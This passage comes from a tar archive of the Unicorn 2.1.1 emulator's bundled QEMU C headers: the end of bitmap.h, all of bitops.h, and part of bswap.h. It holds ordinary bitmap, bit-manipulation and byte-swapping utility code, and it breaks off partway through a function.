BITMAP_LAST_WORD_MASK(nbits) (~0UL >> (-(nbits) & (BITS_PER_LONG - 1))) #define DECLARE_BITMAP(name,bits) \ unsigned long name[BITS_TO_LONGS(bits)] #define small_nbits(nbits) \ ((nbits) <= BITS_PER_LONG) int slow_bitmap_empty(const unsigned long *bitmap, long bits); int slow_bitmap_full(const unsigned long *bitmap, long bits); int slow_bitmap_equal(const unsigned long *bitmap1, const unsigned long *bitmap2, long bits); void slow_bitmap_complement(unsigned long *dst, const unsigned long *src, long bits); int slow_bitmap_and(unsigned long *dst, const unsigned long *bitmap1, const unsigned long *bitmap2, long bits); void slow_bitmap_or(unsigned long *dst, const unsigned long *bitmap1, const unsigned long *bitmap2, long bits); void slow_bitmap_xor(unsigned long *dst, const unsigned long *bitmap1, const unsigned long *bitmap2, long bits); int slow_bitmap_andnot(unsigned long *dst, const unsigned long *bitmap1, const unsigned long *bitmap2, long bits); int slow_bitmap_intersects(const unsigned long *bitmap1, const unsigned long *bitmap2, long bits); long slow_bitmap_count_one(const unsigned long *bitmap, long nbits); static inline unsigned long *bitmap_try_new(long nbits) { long len = BITS_TO_LONGS(nbits) * sizeof(unsigned long); return g_try_malloc0(len); } static inline unsigned long *bitmap_new(long nbits) { unsigned long *ptr = bitmap_try_new(nbits); if (ptr == NULL) { abort(); } return ptr; } static inline void bitmap_zero(unsigned long *dst, long nbits) { if (small_nbits(nbits)) { *dst = 0UL; } else { long len = BITS_TO_LONGS(nbits) * sizeof(unsigned long); memset(dst, 0, len); } } static inline void bitmap_fill(unsigned long *dst, long nbits) { size_t nlongs = BITS_TO_LONGS(nbits); if (!small_nbits(nbits)) { long len = (nlongs - 1) * sizeof(unsigned long); memset(dst, 0xff, len); } dst[nlongs - 1] = BITMAP_LAST_WORD_MASK(nbits); } static inline void bitmap_copy(unsigned long *dst, const unsigned long *src, long nbits) { if (small_nbits(nbits)) { *dst = *src; } else { long len = BITS_TO_LONGS(nbits) * sizeof(unsigned long); memcpy(dst, src, len); } } static inline int bitmap_and(unsigned long *dst, const unsigned long *src1, const unsigned long *src2, long nbits) { if (small_nbits(nbits)) { return (*dst = *src1 & *src2) != 0; } return slow_bitmap_and(dst, src1, src2, nbits); } static inline void bitmap_or(unsigned long *dst, const unsigned long *src1, const unsigned long *src2, long nbits) { if (small_nbits(nbits)) { *dst = *src1 | *src2; } else { slow_bitmap_or(dst, src1, src2, nbits); } } static inline void bitmap_xor(unsigned long *dst, const unsigned long *src1, const unsigned long *src2, long nbits) { if (small_nbits(nbits)) { *dst = *src1 ^ *src2; } else { slow_bitmap_xor(dst, src1, src2, nbits); } } static inline int bitmap_andnot(unsigned long *dst, const unsigned long *src1, const unsigned long *src2, long nbits) { if (small_nbits(nbits)) { return (*dst = *src1 & ~(*src2)) != 0; } return slow_bitmap_andnot(dst, src1, src2, nbits); } static inline void bitmap_complement(unsigned long *dst, const unsigned long *src, long nbits) { if (small_nbits(nbits)) { *dst = ~(*src) & BITMAP_LAST_WORD_MASK(nbits); } else { slow_bitmap_complement(dst, src, nbits); } } static inline int bitmap_equal(const unsigned long *src1, const unsigned long *src2, long nbits) { if (small_nbits(nbits)) { return ! ((*src1 ^ *src2) & BITMAP_LAST_WORD_MASK(nbits)); } else { return slow_bitmap_equal(src1, src2, nbits); } } static inline int bitmap_empty(const unsigned long *src, long nbits) { if (small_nbits(nbits)) { return ! (*src & BITMAP_LAST_WORD_MASK(nbits)); } else { return slow_bitmap_empty(src, nbits); } } static inline int bitmap_full(const unsigned long *src, long nbits) { if (small_nbits(nbits)) { return ! (~(*src) & BITMAP_LAST_WORD_MASK(nbits)); } else { return slow_bitmap_full(src, nbits); } } static inline int bitmap_intersects(const unsigned long *src1, const unsigned long *src2, long nbits) { if (small_nbits(nbits)) { return ((*src1 & *src2) & BITMAP_LAST_WORD_MASK(nbits)) != 0; } else { return slow_bitmap_intersects(src1, src2, nbits); } } static inline long bitmap_count_one(const unsigned long *bitmap, long nbits) { if (!nbits) { return 0; } if (small_nbits(nbits)) { return ctpopl(*bitmap & BITMAP_LAST_WORD_MASK(nbits)); } else { return slow_bitmap_count_one(bitmap, nbits); } } static inline long bitmap_count_one_with_offset(const unsigned long *bitmap, long offset, long nbits) { long aligned_offset = QEMU_ALIGN_DOWN(offset, BITS_PER_LONG); long redundant_bits = offset - aligned_offset; long bits_to_count = nbits + redundant_bits; const unsigned long *bitmap_start = bitmap + aligned_offset / BITS_PER_LONG; return bitmap_count_one(bitmap_start, bits_to_count) - bitmap_count_one(bitmap_start, redundant_bits); } void qemu_bitmap_set(unsigned long *map, long i, long len); void bitmap_set_atomic(unsigned long *map, long i, long len); void qemu_bitmap_clear(unsigned long *map, long start, long nr); bool bitmap_test_and_clear_atomic(unsigned long *map, long start, long nr); void bitmap_copy_and_clear_atomic(unsigned long *dst, unsigned long *src, long nr); unsigned long bitmap_find_next_zero_area(unsigned long *map, unsigned long size, unsigned long start, unsigned long nr, unsigned long align_mask); static inline unsigned long *bitmap_zero_extend(unsigned long *old, long old_nbits, long new_nbits) { long new_len = BITS_TO_LONGS(new_nbits) * sizeof(unsigned long); unsigned long *new = g_realloc(old, new_len); qemu_bitmap_clear(new, old_nbits, new_nbits - old_nbits); return new; } void bitmap_to_le(unsigned long *dst, const unsigned long *src, long nbits); void bitmap_from_le(unsigned long *dst, const unsigned long *src, long nbits); void bitmap_copy_with_src_offset(unsigned long *dst, const unsigned long *src, unsigned long offset, unsigned long nbits); void bitmap_copy_with_dst_offset(unsigned long *dst, const unsigned long *src, unsigned long shift, unsigned long nbits); #endif /* BITMAP_H */ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/bitops.h������������������������������������������������������������0000664�0000000�0000000�00000041601�14675241067�0020220�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Bitops Module * * Copyright (C) 2010 Corentin Chary <corentin.chary@gmail.com> * * Mostly inspired by (stolen from) linux/bitmap.h and linux/bitops.h * * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. * See the COPYING.LIB file in the top-level directory. */ #ifndef BITOPS_H #define BITOPS_H #include "host-utils.h" #include "atomic.h" #define BITS_PER_BYTE CHAR_BIT #define BITS_PER_LONG (sizeof (unsigned long) * BITS_PER_BYTE) #define BIT(nr) (1UL << (nr)) #define BIT_ULL(nr) (1ULL << (nr)) #define BIT_MASK(nr) (1UL << ((nr) % BITS_PER_LONG)) #define BIT_WORD(nr) ((nr) / BITS_PER_LONG) #define BITS_TO_LONGS(nr) DIV_ROUND_UP(nr, BITS_PER_BYTE * sizeof(long)) #define MAKE_64BIT_MASK(shift, length) \ (((~0ULL) >> (64 - (length))) << (shift)) /** * set_bit - Set a bit in memory * @nr: the bit to set * @addr: the address to start counting from */ static inline void set_bit(long nr, unsigned long *addr) { unsigned long mask = BIT_MASK(nr); unsigned long *p = addr + BIT_WORD(nr); *p |= mask; } /** * clear_bit - Clears a bit in memory * @nr: Bit to clear * @addr: Address to start counting from */ static inline void clear_bit(long nr, unsigned long *addr) { unsigned long mask = BIT_MASK(nr); unsigned long *p = addr + BIT_WORD(nr); *p &= ~mask; } /** * change_bit - Toggle a bit in memory * @nr: Bit to change * @addr: Address to start counting from */ static inline void change_bit(long nr, unsigned long *addr) { unsigned long mask = BIT_MASK(nr); unsigned long *p = addr + BIT_WORD(nr); *p ^= mask; } /** * test_and_set_bit - Set a bit and return its old value * @nr: Bit to set * @addr: Address to count from */ static inline int test_and_set_bit(long nr, unsigned long *addr) { unsigned long mask = BIT_MASK(nr); unsigned long *p = addr + BIT_WORD(nr); unsigned long old = *p; *p = old | mask; return (old & mask) != 0; } /** * test_and_clear_bit - Clear a bit and return its old value * @nr: Bit to clear * @addr: Address to count from */ static inline int test_and_clear_bit(long nr, unsigned long *addr) { unsigned long mask = BIT_MASK(nr); unsigned long *p = addr + BIT_WORD(nr); unsigned long old = *p; *p = old & ~mask; return (old & mask) != 0; } /** * test_and_change_bit - Change a bit and return its old value * @nr: Bit to change * @addr: Address to count from */ static inline int test_and_change_bit(long nr, unsigned long *addr) { unsigned long mask = BIT_MASK(nr); unsigned long *p = addr + BIT_WORD(nr); unsigned long old = *p; *p = old ^ mask; return (old & mask) != 0; } /** * test_bit - Determine whether a bit is set * @nr: bit number to test * @addr: Address to start counting from */ static inline int test_bit(long nr, const unsigned long *addr) { return 1UL & (addr[BIT_WORD(nr)] >> (nr & (BITS_PER_LONG-1))); } /** * find_last_bit - find the last set bit in a memory region * @addr: The address to start the search at * @size: The maximum size to search * * Returns the bit number of the first set bit, or size. */ unsigned long find_last_bit(const unsigned long *addr, unsigned long size); /** * find_next_bit - find the next set bit in a memory region * @addr: The address to base the search on * @offset: The bitnumber to start searching at * @size: The bitmap size in bits */ unsigned long find_next_bit(const unsigned long *addr, unsigned long size, unsigned long offset); /** * find_next_zero_bit - find the next cleared bit in a memory region * @addr: The address to base the search on * @offset: The bitnumber to start searching at * @size: The bitmap size in bits */ unsigned long find_next_zero_bit(const unsigned long *addr, unsigned long size, unsigned long offset); /** * find_first_bit - find the first set bit in a memory region * @addr: The address to start the search at * @size: The maximum size to search * * Returns the bit number of the first set bit. */ static inline unsigned long find_first_bit(const unsigned long *addr, unsigned long size) { unsigned long result, tmp; for (result = 0; result < size; result += BITS_PER_LONG) { tmp = *addr++; if (tmp) { result += ctzl(tmp); return result < size ? result : size; } } /* Not found */ return size; } /** * find_first_zero_bit - find the first cleared bit in a memory region * @addr: The address to start the search at * @size: The maximum size to search * * Returns the bit number of the first cleared bit. */ static inline unsigned long find_first_zero_bit(const unsigned long *addr, unsigned long size) { return find_next_zero_bit(addr, size, 0); } /** * rol8 - rotate an 8-bit value left * @word: value to rotate * @shift: bits to roll */ static inline uint8_t rol8(uint8_t word, unsigned int shift) { return (word << shift) | (word >> ((8 - shift) & 7)); } /** * ror8 - rotate an 8-bit value right * @word: value to rotate * @shift: bits to roll */ static inline uint8_t ror8(uint8_t word, unsigned int shift) { return (word >> shift) | (word << ((8 - shift) & 7)); } /** * rol16 - rotate a 16-bit value left * @word: value to rotate * @shift: bits to roll */ static inline uint16_t rol16(uint16_t word, unsigned int shift) { return (word << shift) | (word >> ((16 - shift) & 15)); } /** * ror16 - rotate a 16-bit value right * @word: value to rotate * @shift: bits to roll */ static inline uint16_t ror16(uint16_t word, unsigned int shift) { return (word >> shift) | (word << ((16 - shift) & 15)); } /** * rol32 - rotate a 32-bit value left * @word: value to rotate * @shift: bits to roll */ static inline uint32_t rol32(uint32_t word, unsigned int shift) { return (word << shift) | (word >> ((32 - shift) & 31)); } /** * ror32 - rotate a 32-bit value right * @word: value to rotate * @shift: bits to roll */ static inline uint32_t ror32(uint32_t word, unsigned int shift) { return (word >> shift) | (word << ((32 - shift) & 31)); } /** * rol64 - rotate a 64-bit value left * @word: value to rotate * @shift: bits to roll */ static inline uint64_t rol64(uint64_t word, unsigned int shift) { return (word << shift) | (word >> ((64 - shift) & 63)); } /** * ror64 - rotate a 64-bit value right * @word: value to rotate * @shift: bits to roll */ static inline uint64_t ror64(uint64_t word, unsigned int shift) { return (word >> shift) | (word << ((64 - shift) & 63)); } /** * extract32: * @value: the value to extract the bit field from * @start: the lowest bit in the bit field (numbered from 0) * @length: the length of the bit field * * Extract from the 32 bit input @value the bit field specified by the * @start and @length parameters, and return it. The bit field must * lie entirely within the 32 bit word. It is valid to request that * all 32 bits are returned (ie @length 32 and @start 0). * * Returns: the value of the bit field extracted from the input value. */ static inline uint32_t extract32(uint32_t value, int start, int length) { assert(start >= 0 && length > 0 && length <= 32 - start); return (value >> start) & (~0U >> (32 - length)); } /** * extract8: * @value: the value to extract the bit field from * @start: the lowest bit in the bit field (numbered from 0) * @length: the length of the bit field * * Extract from the 8 bit input @value the bit field specified by the * @start and @length parameters, and return it. The bit field must * lie entirely within the 8 bit word. It is valid to request that * all 8 bits are returned (ie @length 8 and @start 0). * * Returns: the value of the bit field extracted from the input value. */ static inline uint8_t extract8(uint8_t value, int start, int length) { assert(start >= 0 && length > 0 && length <= 8 - start); return extract32(value, start, length); } /** * extract16: * @value: the value to extract the bit field from * @start: the lowest bit in the bit field (numbered from 0) * @length: the length of the bit field * * Extract from the 16 bit input @value the bit field specified by the * @start and @length parameters, and return it. The bit field must * lie entirely within the 16 bit word. It is valid to request that * all 16 bits are returned (ie @length 16 and @start 0). * * Returns: the value of the bit field extracted from the input value. */ static inline uint16_t extract16(uint16_t value, int start, int length) { assert(start >= 0 && length > 0 && length <= 16 - start); return extract32(value, start, length); } /** * extract64: * @value: the value to extract the bit field from * @start: the lowest bit in the bit field (numbered from 0) * @length: the length of the bit field * * Extract from the 64 bit input @value the bit field specified by the * @start and @length parameters, and return it. The bit field must * lie entirely within the 64 bit word. It is valid to request that * all 64 bits are returned (ie @length 64 and @start 0). * * Returns: the value of the bit field extracted from the input value. */ static inline uint64_t extract64(uint64_t value, int start, int length) { assert(start >= 0 && length > 0 && length <= 64 - start); return (value >> start) & (~0ULL >> (64 - length)); } /** * sextract32: * @value: the value to extract the bit field from * @start: the lowest bit in the bit field (numbered from 0) * @length: the length of the bit field * * Extract from the 32 bit input @value the bit field specified by the * @start and @length parameters, and return it, sign extended to * an int32_t (ie with the most significant bit of the field propagated * to all the upper bits of the return value). The bit field must lie * entirely within the 32 bit word. It is valid to request that * all 32 bits are returned (ie @length 32 and @start 0). * * Returns: the sign extended value of the bit field extracted from the * input value. */ static inline int32_t sextract32(uint32_t value, int start, int length) { assert(start >= 0 && length > 0 && length <= 32 - start); /* Note that this implementation relies on right shift of signed * integers being an arithmetic shift. */ return ((int32_t)(value << (32 - length - start))) >> (32 - length); } /** * sextract64: * @value: the value to extract the bit field from * @start: the lowest bit in the bit field (numbered from 0) * @length: the length of the bit field * * Extract from the 64 bit input @value the bit field specified by the * @start and @length parameters, and return it, sign extended to * an int64_t (ie with the most significant bit of the field propagated * to all the upper bits of the return value). The bit field must lie * entirely within the 64 bit word. It is valid to request that * all 64 bits are returned (ie @length 64 and @start 0). * * Returns: the sign extended value of the bit field extracted from the * input value. */ static inline int64_t sextract64(uint64_t value, int start, int length) { assert(start >= 0 && length > 0 && length <= 64 - start); /* Note that this implementation relies on right shift of signed * integers being an arithmetic shift. */ return ((int64_t)(value << (64 - length - start))) >> (64 - length); } /** * deposit32: * @value: initial value to insert bit field into * @start: the lowest bit in the bit field (numbered from 0) * @length: the length of the bit field * @fieldval: the value to insert into the bit field * * Deposit @fieldval into the 32 bit @value at the bit field specified * by the @start and @length parameters, and return the modified * @value. Bits of @value outside the bit field are not modified. * Bits of @fieldval above the least significant @length bits are * ignored. The bit field must lie entirely within the 32 bit word. * It is valid to request that all 32 bits are modified (ie @length * 32 and @start 0). * * Returns: the modified @value. */ static inline uint32_t deposit32(uint32_t value, int start, int length, uint32_t fieldval) { uint32_t mask; assert(start >= 0 && length > 0 && length <= 32 - start); mask = (~0U >> (32 - length)) << start; return (value & ~mask) | ((fieldval << start) & mask); } /** * deposit64: * @value: initial value to insert bit field into * @start: the lowest bit in the bit field (numbered from 0) * @length: the length of the bit field * @fieldval: the value to insert into the bit field * * Deposit @fieldval into the 64 bit @value at the bit field specified * by the @start and @length parameters, and return the modified * @value. Bits of @value outside the bit field are not modified. * Bits of @fieldval above the least significant @length bits are * ignored. The bit field must lie entirely within the 64 bit word. * It is valid to request that all 64 bits are modified (ie @length * 64 and @start 0). * * Returns: the modified @value. */ static inline uint64_t deposit64(uint64_t value, int start, int length, uint64_t fieldval) { uint64_t mask; assert(start >= 0 && length > 0 && length <= 64 - start); mask = (~0ULL >> (64 - length)) << start; return (value & ~mask) | ((fieldval << start) & mask); } /** * half_shuffle32: * @x: 32-bit value (of which only the bottom 16 bits are of interest) * * Given an input value:: * * xxxx xxxx xxxx xxxx ABCD EFGH IJKL MNOP * * return the value where the bottom 16 bits are spread out into * the odd bits in the word, and the even bits are zeroed:: * * 0A0B 0C0D 0E0F 0G0H 0I0J 0K0L 0M0N 0O0P * * Any bits set in the top half of the input are ignored. * * Returns: the shuffled bits. */ static inline uint32_t half_shuffle32(uint32_t x) { /* This algorithm is from _Hacker's Delight_ section 7-2 "Shuffling Bits". * It ignores any bits set in the top half of the input. */ x = ((x & 0xFF00) << 8) | (x & 0x00FF); x = ((x << 4) | x) & 0x0F0F0F0F; x = ((x << 2) | x) & 0x33333333; x = ((x << 1) | x) & 0x55555555; return x; } /** * half_shuffle64: * @x: 64-bit value (of which only the bottom 32 bits are of interest) * * Given an input value:: * * xxxx xxxx xxxx .... xxxx xxxx ABCD EFGH IJKL MNOP QRST UVWX YZab cdef * * return the value where the bottom 32 bits are spread out into * the odd bits in the word, and the even bits are zeroed:: * * 0A0B 0C0D 0E0F 0G0H 0I0J 0K0L 0M0N .... 0U0V 0W0X 0Y0Z 0a0b 0c0d 0e0f * * Any bits set in the top half of the input are ignored. * * Returns: the shuffled bits. */ static inline uint64_t half_shuffle64(uint64_t x) { /* This algorithm is from _Hacker's Delight_ section 7-2 "Shuffling Bits". * It ignores any bits set in the top half of the input. */ x = ((x & 0xFFFF0000ULL) << 16) | (x & 0xFFFF); x = ((x << 8) | x) & 0x00FF00FF00FF00FFULL; x = ((x << 4) | x) & 0x0F0F0F0F0F0F0F0FULL; x = ((x << 2) | x) & 0x3333333333333333ULL; x = ((x << 1) | x) & 0x5555555555555555ULL; return x; } /** * half_unshuffle32: * @x: 32-bit value (of which only the odd bits are of interest) * * Given an input value:: * * xAxB xCxD xExF xGxH xIxJ xKxL xMxN xOxP * * return the value where all the odd bits are compressed down * into the low half of the word, and the high half is zeroed:: * * 0000 0000 0000 0000 ABCD EFGH IJKL MNOP * * Any even bits set in the input are ignored. * * Returns: the unshuffled bits. */ static inline uint32_t half_unshuffle32(uint32_t x) { /* This algorithm is from _Hacker's Delight_ section 7-2 "Shuffling Bits". * where it is called an inverse half shuffle. */ x &= 0x55555555; x = ((x >> 1) | x) & 0x33333333; x = ((x >> 2) | x) & 0x0F0F0F0F; x = ((x >> 4) | x) & 0x00FF00FF; x = ((x >> 8) | x) & 0x0000FFFF; return x; } /** * half_unshuffle64: * @x: 64-bit value (of which only the odd bits are of interest) * * Given an input value:: * * xAxB xCxD xExF xGxH xIxJ xKxL xMxN .... xUxV xWxX xYxZ xaxb xcxd xexf * * return the value where all the odd bits are compressed down * into the low half of the word, and the high half is zeroed:: * * 0000 0000 0000 .... 0000 0000 ABCD EFGH IJKL MNOP QRST UVWX YZab cdef * * Any even bits set in the input are ignored. * * Returns: the unshuffled bits. */ static inline uint64_t half_unshuffle64(uint64_t x) { /* This algorithm is from _Hacker's Delight_ section 7-2 "Shuffling Bits". * where it is called an inverse half shuffle. */ x &= 0x5555555555555555ULL; x = ((x >> 1) | x) & 0x3333333333333333ULL; x = ((x >> 2) | x) & 0x0F0F0F0F0F0F0F0FULL; x = ((x >> 4) | x) & 0x00FF00FF00FF00FFULL; x = ((x >> 8) | x) & 0x0000FFFF0000FFFFULL; x = ((x >> 16) | x) & 0x00000000FFFFFFFFULL; return x; } #endif �������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/bswap.h�������������������������������������������������������������0000664�0000000�0000000�00000035137�14675241067�0020043�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef BSWAP_H #define BSWAP_H #include "osdep.h" #include "fpu/softfloat-types.h" #ifdef CONFIG_MACHINE_BSWAP_H # include <sys/endian.h> # include <machine/bswap.h> #elif defined(__FreeBSD__) # include <sys/endian.h> #elif defined(CONFIG_BYTESWAP_H) # include <byteswap.h> static inline uint16_t bswap16(uint16_t x) { return bswap_16(x); } static inline uint32_t bswap32(uint32_t x) { return bswap_32(x); } static inline uint64_t bswap64(uint64_t x) { return bswap_64(x); } # else static inline uint16_t bswap16(uint16_t x) { return (((x & 0x00ff) << 8) | ((x & 0xff00) >> 8)); } static inline uint32_t bswap32(uint32_t x) { return (((x & 0x000000ffU) << 24) | ((x & 0x0000ff00U) << 8) | ((x & 0x00ff0000U) >> 8) | ((x & 0xff000000U) >> 24)); } static inline uint64_t bswap64(uint64_t x) { return (((x & 0x00000000000000ffULL) << 56) | ((x & 0x000000000000ff00ULL) << 40) | ((x & 0x0000000000ff0000ULL) << 24) | ((x & 0x00000000ff000000ULL) << 8) | ((x & 0x000000ff00000000ULL) >> 8) | ((x & 0x0000ff0000000000ULL) >> 24) | ((x & 0x00ff000000000000ULL) >> 40) | ((x & 0xff00000000000000ULL) >> 56)); } #endif /* ! CONFIG_MACHINE_BSWAP_H */ static inline void bswap16s(uint16_t *s) { *s = bswap16(*s); } static inline void bswap32s(uint32_t *s) { *s = bswap32(*s); } static inline void bswap64s(uint64_t *s) { *s = bswap64(*s); } #if defined(HOST_WORDS_BIGENDIAN) #define be_bswap(v, size) (v) #define le_bswap(v, size) glue(bswap, size)(v) #define be_bswaps(v, size) #define le_bswaps(p, size) do { *p = glue(bswap, size)(*p); } while(0) #else #define le_bswap(v, size) (v) #define be_bswap(v, size) glue(bswap, size)(v) #define le_bswaps(v, size) #define be_bswaps(p, size) do { *p = glue(bswap, size)(*p); } while(0) #endif /** * Endianness conversion functions between host cpu and specified endianness. * (We list the complete set of prototypes produced by the macros below * to assist people who search the headers to find their definitions.) * * uint16_t le16_to_cpu(uint16_t v); * uint32_t le32_to_cpu(uint32_t v); * uint64_t le64_to_cpu(uint64_t v); * uint16_t be16_to_cpu(uint16_t v); * uint32_t be32_to_cpu(uint32_t v); * uint64_t be64_to_cpu(uint64_t v); * * Convert the value @v from the specified format to the native * endianness of the host CPU by byteswapping if necessary, and * return the converted value. * * uint16_t cpu_to_le16(uint16_t v); * uint32_t cpu_to_le32(uint32_t v); * uint64_t cpu_to_le64(uint64_t v); * uint16_t cpu_to_be16(uint16_t v); * uint32_t cpu_to_be32(uint32_t v); * uint64_t cpu_to_be64(uint64_t v); * * Convert the value @v from the native endianness of the host CPU to * the specified format by byteswapping if necessary, and return * the converted value. * * void le16_to_cpus(uint16_t *v); * void le32_to_cpus(uint32_t *v); * void le64_to_cpus(uint64_t *v); * void be16_to_cpus(uint16_t *v); * void be32_to_cpus(uint32_t *v); * void be64_to_cpus(uint64_t *v); * * Do an in-place conversion of the value pointed to by @v from the * specified format to the native endianness of the host CPU. * * void cpu_to_le16s(uint16_t *v); * void cpu_to_le32s(uint32_t *v); * void cpu_to_le64s(uint64_t *v); * void cpu_to_be16s(uint16_t *v); * void cpu_to_be32s(uint32_t *v); * void cpu_to_be64s(uint64_t *v); * * Do an in-place conversion of the value pointed to by @v from the * native endianness of the host CPU to the specified format. * * Both X_to_cpu() and cpu_to_X() perform the same operation; you * should use whichever one is better documenting of the function your * code is performing. * * Do not use these functions for conversion of values which are in guest * memory, since the data may not be sufficiently aligned for the host CPU's * load and store instructions. Instead you should use the ld*_p() and * st*_p() functions, which perform loads and stores of data of any * required size and endianness and handle possible misalignment. */ #define CPU_CONVERT(endian, size, type)\ static inline type endian ## size ## _to_cpu(type v)\ {\ return glue(endian, _bswap)(v, size);\ }\ \ static inline type cpu_to_ ## endian ## size(type v)\ {\ return glue(endian, _bswap)(v, size);\ }\ \ static inline void endian ## size ## _to_cpus(type *p)\ {\ glue(endian, _bswaps)(p, size);\ }\ \ static inline void cpu_to_ ## endian ## size ## s(type *p)\ {\ glue(endian, _bswaps)(p, size);\ } CPU_CONVERT(be, 16, uint16_t) CPU_CONVERT(be, 32, uint32_t) CPU_CONVERT(be, 64, uint64_t) CPU_CONVERT(le, 16, uint16_t) CPU_CONVERT(le, 32, uint32_t) CPU_CONVERT(le, 64, uint64_t) /* len must be one of 1, 2, 4 */ static inline uint32_t qemu_bswap_len(uint32_t value, int len) { return bswap32(value) >> (32 - 8 * len); } /* * Same as cpu_to_le{16,32}, except that gcc will figure the result is * a compile-time constant if you pass in a constant. So this can be * used to initialize static variables. */ #if defined(HOST_WORDS_BIGENDIAN) # define const_le32(_x) \ ((((_x) & 0x000000ffU) << 24) | \ (((_x) & 0x0000ff00U) << 8) | \ (((_x) & 0x00ff0000U) >> 8) | \ (((_x) & 0xff000000U) >> 24)) # define const_le16(_x) \ ((((_x) & 0x00ff) << 8) | \ (((_x) & 0xff00) >> 8)) #else # define const_le32(_x) (_x) # define const_le16(_x) (_x) #endif /* Unions for reinterpreting between floats and integers. */ typedef union { float32 f; uint32_t l; } CPU_FloatU; typedef union { float64 d; #if defined(HOST_WORDS_BIGENDIAN) struct { uint32_t upper; uint32_t lower; } l; #else struct { uint32_t lower; uint32_t upper; } l; #endif uint64_t ll; } CPU_DoubleU; typedef union { floatx80 d; struct { uint64_t lower; uint16_t upper; } l; } CPU_LDoubleU; typedef union { float128 q; #if defined(HOST_WORDS_BIGENDIAN) struct { uint32_t upmost; uint32_t upper; uint32_t lower; uint32_t lowest; } l; struct { uint64_t upper; uint64_t lower; } ll; #else struct { uint32_t lowest; uint32_t lower; uint32_t upper; uint32_t upmost; } l; struct { uint64_t lower; uint64_t upper; } ll; #endif } CPU_QuadU; /* unaligned/endian-independent pointer access */ /* * the generic syntax is: * * load: ld{type}{sign}{size}_{endian}_p(ptr) * * store: st{type}{size}_{endian}_p(ptr, val) * * Note there are small differences with the softmmu access API! * * type is: * (empty): integer access * f : float access * * sign is: * (empty): for 32 or 64 bit sizes (including floats and doubles) * u : unsigned * s : signed * * size is: * b: 8 bits * w: 16 bits * l: 32 bits * q: 64 bits * * endian is: * he : host endian * be : big endian * le : little endian * te : target endian * (except for byte accesses, which have no endian infix). * * The target endian accessors are obviously only available to source * files which are built per-target; they are defined in cpu-all.h. * * In all cases these functions take a host pointer. * For accessors that take a guest address rather than a * host address, see the cpu_{ld,st}_* accessors defined in * cpu_ldst.h. * * For cases where the size to be used is not fixed at compile time, * there are * stn_{endian}_p(ptr, sz, val) * which stores @val to @ptr as an @endian-order number @sz bytes in size * and * ldn_{endian}_p(ptr, sz) * which loads @sz bytes from @ptr as an unsigned @endian-order number * and returns it in a uint64_t. */ static inline int ldub_p(const void *ptr) { return *(uint8_t *)ptr; } static inline int ldsb_p(const void *ptr) { return *(int8_t *)ptr; } static inline void stb_p(void *ptr, uint8_t v) { *(uint8_t *)ptr = v; } /* * Any compiler worth its salt will turn these memcpy into native unaligned * operations. Thus we don't need to play games with packed attributes, or * inline byte-by-byte stores. * Some compilation environments (eg some fortify-source implementations) * may intercept memcpy() in a way that defeats the compiler optimization, * though, so we use __builtin_memcpy() to give ourselves the best chance * of good performance. */ static inline int lduw_he_p(const void *ptr) { uint16_t r; #ifdef _MSC_VER memcpy(&r, ptr, sizeof(r)); #else __builtin_memcpy(&r, ptr, sizeof(r)); #endif return r; } static inline int ldsw_he_p(const void *ptr) { int16_t r; #ifdef _MSC_VER memcpy(&r, ptr, sizeof(r)); #else __builtin_memcpy(&r, ptr, sizeof(r)); #endif return r; } static inline void stw_he_p(void *ptr, uint16_t v) { #ifdef _MSC_VER memcpy(ptr, &v, sizeof(v)); #else __builtin_memcpy(ptr, &v, sizeof(v)); #endif } static inline int ldl_he_p(const void *ptr) { int32_t r; #ifdef _MSC_VER memcpy(&r, ptr, sizeof(r)); #else __builtin_memcpy(&r, ptr, sizeof(r)); #endif return r; } static inline void stl_he_p(void *ptr, uint32_t v) { #ifdef _MSC_VER memcpy(ptr, &v, sizeof(v)); #else __builtin_memcpy(ptr, &v, sizeof(v)); #endif } static inline uint64_t ldq_he_p(const void *ptr) { uint64_t r; #ifdef _MSC_VER memcpy(&r, ptr, sizeof(r)); #else __builtin_memcpy(&r, ptr, sizeof(r)); #endif return r; } static inline void stq_he_p(void *ptr, uint64_t v) { #ifdef _MSC_VER memcpy(ptr, &v, sizeof(v)); #else __builtin_memcpy(ptr, &v, sizeof(v)); #endif } static inline int lduw_le_p(const void *ptr) { return (uint16_t)le_bswap(lduw_he_p(ptr), 16); } static inline int ldsw_le_p(const void *ptr) { return (int16_t)le_bswap(lduw_he_p(ptr), 16); } static inline int ldl_le_p(const void *ptr) { return le_bswap(ldl_he_p(ptr), 32); } static inline uint64_t ldq_le_p(const void *ptr) { return le_bswap(ldq_he_p(ptr), 64); } static inline void stw_le_p(void *ptr, uint16_t v) { stw_he_p(ptr, le_bswap(v, 16)); } static inline void stl_le_p(void *ptr, uint32_t v) { stl_he_p(ptr, le_bswap(v, 32)); } static inline void stq_le_p(void *ptr, uint64_t v) { stq_he_p(ptr, le_bswap(v, 64)); } /* float access */ static inline float32 ldfl_le_p(const void *ptr) { CPU_FloatU u; u.l = ldl_le_p(ptr); return u.f; } static inline void stfl_le_p(void *ptr, float32 v) { CPU_FloatU u; u.f = v; stl_le_p(ptr, u.l); } static inline float64 ldfq_le_p(const void *ptr) { CPU_DoubleU u; u.ll = ldq_le_p(ptr); return u.d; } static inline void stfq_le_p(void *ptr, float64 v) { CPU_DoubleU u; u.d = v; stq_le_p(ptr, u.ll); } static inline int lduw_be_p(const void *ptr) { return (uint16_t)be_bswap(lduw_he_p(ptr), 16); } static inline int ldsw_be_p(const void *ptr) { return (int16_t)be_bswap(lduw_he_p(ptr), 16); } static inline int ldl_be_p(const void *ptr) { return be_bswap(ldl_he_p(ptr), 32); } static inline uint64_t ldq_be_p(const void *ptr) { return be_bswap(ldq_he_p(ptr), 64); } static inline void stw_be_p(void *ptr, uint16_t v) { stw_he_p(ptr, be_bswap(v, 16)); } static inline void stl_be_p(void *ptr, uint32_t v) { stl_he_p(ptr, be_bswap(v, 32)); } static inline void stq_be_p(void *ptr, uint64_t 